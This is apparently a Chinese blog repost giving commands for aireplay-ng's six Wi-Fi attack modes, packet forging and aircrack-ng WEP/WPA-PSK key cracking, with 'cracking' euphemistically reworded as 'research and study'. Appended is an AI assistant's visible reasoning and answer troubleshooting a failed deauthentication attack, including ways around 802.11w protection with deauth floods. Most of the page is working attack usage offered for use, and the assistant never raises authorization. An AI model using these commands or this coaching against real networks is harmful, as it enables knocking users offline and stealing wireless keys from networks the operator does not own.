Aireplay-ng 的 6 种攻击模式详解

本文详细介绍了Aireplay-ng的六种攻击模式,包括Deauthentication冲突模式、Fake Authentication伪装连接模式、Interactive交互模式、ARP-request注入模式、Chopchop攻击模式和Fragment碎片包攻击模式。此外,还讲解了Packetforge-ng数据包制造程序和Aircrack-ng WEP及WPA-PSK key破解主程序的使用方法。
Aireplay-ng 的 6 种攻击模式详解
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
【-a】:设置 ap 的 mac
【-c】:设置已连接的合法客户端的 mac。
如果不设置-c,则断开所有和 ap 连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和 AP 进行连接。
这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP 接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。
用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时
【-e】:设置 ap 的 essid
【-a】:设置 ap 的 mac
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式
1.这种模式主要用于研究学习无客户端,先用-1 建立虚假客户端连接然后直接发包攻击 ,
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
【-2】:交互攻击模式
【-p】:设置控制帧中包含的信息(16 进制),默认采用 0841
【-c】:设置目标 mac 地址
【-b】:设置 ap 的 mac 地址
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
2.提取包,发送注入数据包 aireplay-ng -2 –r <file> -x 1024 wifi0 发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程 这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和 ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。
如果合法客户端和ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
【-3】:arp 注入攻击模式
【-b】:设置 ap 的 mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)
-4 Chopchop 攻击模式
用以获得一个包含密钥数据的 xor 文件 这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 参数说明:
【-b】:设置需要研究学习的 AP 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
-5 fragment 碎片包攻击模式
用以获得 PRGA(包含密钥的后缀为 xor 的文件) 这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key 数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻击模式
【-b】:设置 ap 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
Packetforge-ng:数据包制造程序 Packetforge-ng <mode> <options>Mode
【-0】:伪造 ARP 包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp
参数说明:
【-0】:伪装 arp 数据包
【-a】:设置 ap 的 mac
【-h】设置虚拟伪装连接的 mac(即自己的 mac)
【-k】<ip[:port]>说明:设置目标文件 IP 和端口
【-l】<ip[:port]>说明:设置源文件 IP 和端口
【-y】<file>说明:从 xor 文件中读取 PRGA。后面跟 xor 的文件名。
【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究学习主程序
Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs )
参数说明:
【-n】:设置 WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力研究学习模式
【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2 aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。

转载于:https://www.cnblogs.com/shanmao/archive/2012/12/03/2799728.html

<think>嗯,用户遇到了使用aireplay-ng -0攻击无效的问题,需要找出原因和解决方案。首先,我要回忆一下aireplay-ng -0命令的作用,这是用来发起取消身份验证攻击的,强制客户端与AP断开连接,以便捕获握手包。用户说攻击无效,可能有多种原因。 首先,常见的错误原因可能包括无线网卡不支持监控模式。用户可能没有正确将网卡设置为监控模式,或者网卡驱动不支持。比如有些网卡需要特定的驱动,比如rtl8812au可能需要手动安装驱动。这时候需要检查网卡型号和驱动支持情况。 然后是目标设备的问题。如果AP或客户端启用了保护措施,比如802.11w管理帧保护(MFP),那么取消验证攻击可能无效。此外,客户端可能已经断开连接,或者信号强度不足,导致攻击包无法到达。用户需要确认目标设备是否在线,信号是否足够强。 命令参数错误也是一个可能的原因。比如MAC地址输入错误,或者接口名称不正确。需要检查-a后面的AP MAC和-c后面的客户端MAC是否正确,以及接口是否为监控模式下的接口,比如wlan0mon而不是wlan0。 还有可能是网络环境干扰,比如有其他设备干扰,或者AP在攻击后快速重连,导致难以捕获握手包。此外,用户可能需要配合其他工具,比如同时运行airodump-ng来捕获握手包,否则即使攻击成功,没有及时捕获的话也会显示无效。 接下来是解决方案。首先确认网卡是否支持监控模式,使用airmon-ng start wlan0来开启,并检查是否有错误。然后验证目标AP和客户端是否正确,用airodump-ng扫描确认MAC地址和信号强度。检查命令语法是否正确,特别是接口名称是否正确。如果怀疑802.11w,可以用airodump-ng查看AP的Beacon帧中是否有“Privacy”和“MFP”标志。如果启用了MFP,可能需要换目标。尝试攻击多个客户端,增加攻击次数,比如把-0后面的数字改为10,持续攻击。确保同时运行airodump-ng捕获握手包。如果驱动有问题,可能需要安装正确的驱动,比如使用DKMS安装。 最后,用户可能需要更新工具版本,或者更换网卡。比如使用最新版的Kali Linux,或者换用支持注入的网卡如Alfa AWUS036系列。如果所有方法都无效,可能需要检查系统日志或使用Wireshark分析数据包,查看攻击包是否被正确发送。 另外,根据用户提供的引用内容,取消身份验证攻击需要AP不忽略NULL的探测请求,但有些AP可能配置为不响应,这可能影响攻击效果。不过主要问题还是在于监控模式、驱动支持、命令参数和目标设备的防护措施。需要一步步排查这些可能性,帮助用户解决问题。</think>针对aireplay-ng -0攻击无效的问题,以下是分步骤的解决方案和错误原因分析: ### 一、错误原因排查 1. **监控模式未启用** 必须使用`airmon-ng start wlan0`将无线网卡切换至监控模式(如`wlan0mon`),普通模式无法发送攻击数据包[^1]。 2. **驱动/硬件不兼容** 部分无线网卡(如Realtek芯片)需安装专用驱动(如`rtl8812au-dkms`),否则无法执行数据包注入。 3. **目标设备防护机制** 支持802.11w标准的设备会加密管理帧(如解除关联帧),导致攻击失效。可通过`airodump-ng`查看AP的Beacon帧是否包含"MFP"标识[^2]。 4. **MAC地址或参数错误** `-a`参数需AP的MAC地址,`-c`参数需客户端MAC地址。若目标设备已离线或信号弱(RSSI低于-75dBm),攻击将失效。 ### 二、分步解决方案 #### 步骤1:验证监控模式 ```bash airmon-ng check kill airmon-ng start wlan0 # 生成监控接口如wlan0mon iwconfig | grep Mode # 确认显示"Mode:Monitor" ``` #### 步骤2:检测目标状态 ```bash airodump-ng wlan0mon # 确认目标AP的BSSID、信道(CH)和客户端活跃状态 ``` #### 步骤3:优化攻击命令 ```bash aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon # -0后数字表示攻击次数,建议≥10次 # 必须使用监控模式接口名称(如wlan0mon) ``` #### 步骤4:绕过802.11w防护 若AP的Beacon帧显示`MFP: Enabled`,可尝试: 1. 改用针对客户端的定向攻击 2. 结合`mdk4`的解除认证洪水攻击 3. 寻找未启用MFP的AP ### 三、辅助验证方法 ```bash # 捕获握手包验证攻击效果 airodump-ng -c 6 --bssid AP_MAC -w capture.pcap wlan0mon ``` 观察抓包文件是否出现"WPA handshake"提示。 ### 四、硬件/驱动修复 ```bash # Realtek芯片示例 sudo apt install dkms git clone https://github.com/aircrack-ng/rtl8812au cd rtl8812au && make && sudo make install ``` ### 五、高级调试技巧 通过Wireshark分析攻击流量: 1. 过滤条件:`wlan.fc.type_subtype == 0x000c`(解除关联帧) 2. 检查目标MAC是否匹配 3. 确认Frame Control字段未加密
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值